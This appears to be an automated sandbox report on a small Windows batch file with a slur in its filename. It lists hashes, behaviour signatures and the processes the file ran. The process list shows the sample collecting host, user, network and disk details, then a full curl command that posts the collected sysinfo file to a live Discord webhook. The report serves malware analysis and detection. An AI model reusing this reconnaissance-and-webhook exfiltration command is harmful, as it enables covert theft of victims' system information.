Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
01/04/2025, 14:40
Static task
static1
Behavioral task
behavioral1
Sample
niggagimeinfo.bat
Resource
win10ltsc2021-20250314-en
windows10-ltsc_2021-x64
10 signatures
150 seconds
General
-
Target
niggagimeinfo.bat
-
Size
732B
-
MD5
a874910a487c124be0f303e1c626091c
-
SHA1
1f160820d42a658baf7b4fa3759847d2acdef6a0
-
SHA256
c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
-
SHA512
df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config
Signatures
-
Hawkeye family
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 discord.com 18 discord.com -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 4504 WMIC.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3404 ipconfig.exe 5724 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3252 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4504 WMIC.exe 4504 WMIC.exe 4504 WMIC.exe 4504 WMIC.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 2764 whoami.exe Token: SeIncreaseQuotaPrivilege 4504 WMIC.exe Token: SeSecurityPrivilege 4504 WMIC.exe Token: SeTakeOwnershipPrivilege 4504 WMIC.exe Token: SeLoadDriverPrivilege 4504 WMIC.exe Token: SeSystemProfilePrivilege 4504 WMIC.exe Token: SeSystemtimePrivilege 4504 WMIC.exe Token: SeProfSingleProcessPrivilege 4504 WMIC.exe Token: SeIncBasePriorityPrivilege 4504 WMIC.exe Token: SeCreatePagefilePrivilege 4504 WMIC.exe Token: SeBackupPrivilege 4504 WMIC.exe Token: SeRestorePrivilege 4504 WMIC.exe Token: SeShutdownPrivilege 4504 WMIC.exe Token: SeDebugPrivilege 4504 WMIC.exe Token: SeSystemEnvironmentPrivilege 4504 WMIC.exe Token: SeRemoteShutdownPrivilege 4504 WMIC.exe Token: SeUndockPrivilege 4504 WMIC.exe Token: SeManageVolumePrivilege 4504 WMIC.exe Token: 33 4504 WMIC.exe Token: 34 4504 WMIC.exe Token: 35 4504 WMIC.exe Token: 36 4504 WMIC.exe Token: SeIncreaseQuotaPrivilege 4504 WMIC.exe Token: SeSecurityPrivilege 4504 WMIC.exe Token: SeTakeOwnershipPrivilege 4504 WMIC.exe Token: SeLoadDriverPrivilege 4504 WMIC.exe Token: SeSystemProfilePrivilege 4504 WMIC.exe Token: SeSystemtimePrivilege 4504 WMIC.exe Token: SeProfSingleProcessPrivilege 4504 WMIC.exe Token: SeIncBasePriorityPrivilege 4504 WMIC.exe Token: SeCreatePagefilePrivilege 4504 WMIC.exe Token: SeBackupPrivilege 4504 WMIC.exe Token: SeRestorePrivilege 4504 WMIC.exe Token: SeShutdownPrivilege 4504 WMIC.exe Token: SeDebugPrivilege 4504 WMIC.exe Token: SeSystemEnvironmentPrivilege 4504 WMIC.exe Token: SeRemoteShutdownPrivilege 4504 WMIC.exe Token: SeUndockPrivilege 4504 WMIC.exe Token: SeManageVolumePrivilege 4504 WMIC.exe Token: 33 4504 WMIC.exe Token: 34 4504 WMIC.exe Token: 35 4504 WMIC.exe Token: 36 4504 WMIC.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 5536 wrote to memory of 1564 5536 cmd.exe 82 PID 5536 wrote to memory of 1564 5536 cmd.exe 82 PID 5536 wrote to memory of 2764 5536 cmd.exe 83 PID 5536 wrote to memory of 2764 5536 cmd.exe 83 PID 5536 wrote to memory of 3252 5536 cmd.exe 84 PID 5536 wrote to memory of 3252 5536 cmd.exe 84 PID 5536 wrote to memory of 460 5536 cmd.exe 85 PID 5536 wrote to memory of 460 5536 cmd.exe 85 PID 5536 wrote to memory of 3404 5536 cmd.exe 88 PID 5536 wrote to memory of 3404 5536 cmd.exe 88 PID 5536 wrote to memory of 5252 5536 cmd.exe 89 PID 5536 wrote to memory of 5252 5536 cmd.exe 89 PID 5536 wrote to memory of 5724 5536 cmd.exe 92 PID 5536 wrote to memory of 5724 5536 cmd.exe 92 PID 5536 wrote to memory of 1464 5536 cmd.exe 93 PID 5536 wrote to memory of 1464 5536 cmd.exe 93 PID 5536 wrote to memory of 4504 5536 cmd.exe 94 PID 5536 wrote to memory of 4504 5536 cmd.exe 94 PID 5536 wrote to memory of 5608 5536 cmd.exe 95 PID 5536 wrote to memory of 5608 5536 cmd.exe 95 -
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 18 curl/8.7.1
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5536 -
C:\Windows\system32\HOSTNAME.EXEhostname2⤵PID:1564
-
-
C:\Windows\system32\whoami.exewhoami2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:3252
-
-
C:\Windows\system32\findstr.exefindstr /B /C:"OS Name" /C:"OS Version"2⤵PID:460
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:3404
-
-
C:\Windows\system32\findstr.exefindstr IPv62⤵PID:5252
-
-
C:\Windows\system32\ipconfig.exeipconfig2⤵
- Gathers network information
PID:5724
-
-
C:\Windows\system32\findstr.exefindstr IPv42⤵PID:1464
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption, freespace, size2⤵
- Collects information from the system
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\system32\curl.execurl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"2⤵PID:5608
-